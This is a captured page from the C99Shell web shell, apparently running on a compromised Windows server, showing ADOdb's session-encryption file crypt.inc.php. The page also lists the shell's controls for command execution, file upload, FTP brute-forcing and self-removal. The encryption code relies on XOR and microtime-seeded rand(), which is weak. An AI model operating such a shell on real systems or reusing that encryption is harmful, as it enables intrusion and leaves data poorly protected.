!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\php\pear\adodb\session\   drwxrwxrwx
Free 8 GB of 239.26 GB (3.34%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     crypt.inc.php (2.75 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//     Session Encryption by Ari Kuorikoski <ari.kuorikoski@finebyte.com>
class MD5Crypt{
        function 
keyED($txt,$encrypt_key)
        {
                
$encrypt_key md5($encrypt_key);
                
$ctr=0;
                
$tmp "";
                for (
$i=0;$i<strlen($txt);$i++){
                        if (
$ctr==strlen($encrypt_key)) $ctr=0;
                        
$tmp.= substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1);
                        
$ctr++;
                }
                return 
$tmp;
        }

        function 
Encrypt($txt,$key)
        {
                
srand((double)microtime()*1000000);
                
$encrypt_key md5(rand(0,32000));
                
$ctr=0;
                
$tmp "";
                for (
$i=0;$i<strlen($txt);$i++)
                {
                if (
$ctr==strlen($encrypt_key)) $ctr=0;
                
$tmp.= substr($encrypt_key,$ctr,1) .
                (
substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1));
                
$ctr++;
                }
                return 
base64_encode($this->keyED($tmp,$key));
        }

        function 
Decrypt($txt,$key)
        {
                
$txt $this->keyED(base64_decode($txt),$key);
                
$tmp "";
                for (
$i=0;$i<strlen($txt);$i++){
                        
$md5 substr($txt,$i,1);
                        
$i++;
                        
$tmp.= (substr($txt,$i,1) ^ $md5);
                }
                return 
$tmp;
        }

        function 
RandPass()
        {
                
$randomPassword "";
                
srand((double)microtime()*1000000);
                for(
$i=0;$i<8;$i++)
                {
                        
$randnumber rand(48,120);

                        while ((
$randnumber >= 58 && $randnumber <= 64) || ($randnumber >= 91 && $randnumber <= 96))
                        {
                                
$randnumber rand(48,120);
                        }

                        
$randomPassword .= chr($randnumber);
                }
                return 
$randomPassword;
        }

}


class 
SHA1Crypt{
        function 
keyED($txt,$encrypt_key)
        {

                
$encrypt_key sha1($encrypt_key);
                
$ctr=0;
                
$tmp "";

                for (
$i=0;$i<strlen($txt);$i++){
                        if (
$ctr==strlen($encrypt_key)) $ctr=0;
                        
$tmp.= substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1);
                        
$ctr++;
                }
                return 
$tmp;

        }

        function 
Encrypt($txt,$key)
        {

                
srand((double)microtime()*1000000);
                
$encrypt_key sha1(rand(0,32000));
                
$ctr=0;
                
$tmp "";

                for (
$i=0;$i<strlen($txt);$i++)

                {

                if (
$ctr==strlen($encrypt_key)) $ctr=0;

                
$tmp.= substr($encrypt_key,$ctr,1) .

                (
substr($txt,$i,1) ^ substr($encrypt_key,$ctr,1));

                
$ctr++;

                }

                return 
base64_encode($this->keyED($tmp,$key));

        }



        function 
Decrypt($txt,$key)
        {

                
$txt $this->keyED(base64_decode($txt),$key);

                
$tmp "";

                for (
$i=0;$i<strlen($txt);$i++){

                        
$sha1 substr($txt,$i,1);

                        
$i++;

                        
$tmp.= (substr($txt,$i,1) ^ $sha1);

                }

                return 
$tmp;
        }



        function 
RandPass()
        {
                
$randomPassword "";
                
srand((double)microtime()*1000000);

                for(
$i=0;$i<8;$i++)
                {

                        
$randnumber rand(48,120);

                        while ((
$randnumber >= 58 && $randnumber <= 64) || ($randnumber >= 91 && $randnumber <= 96))
                        {
                                
$randnumber rand(48,120);
                        }

                        
$randomPassword .= chr($randnumber);
                }

                return 
$randomPassword;

        }



}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--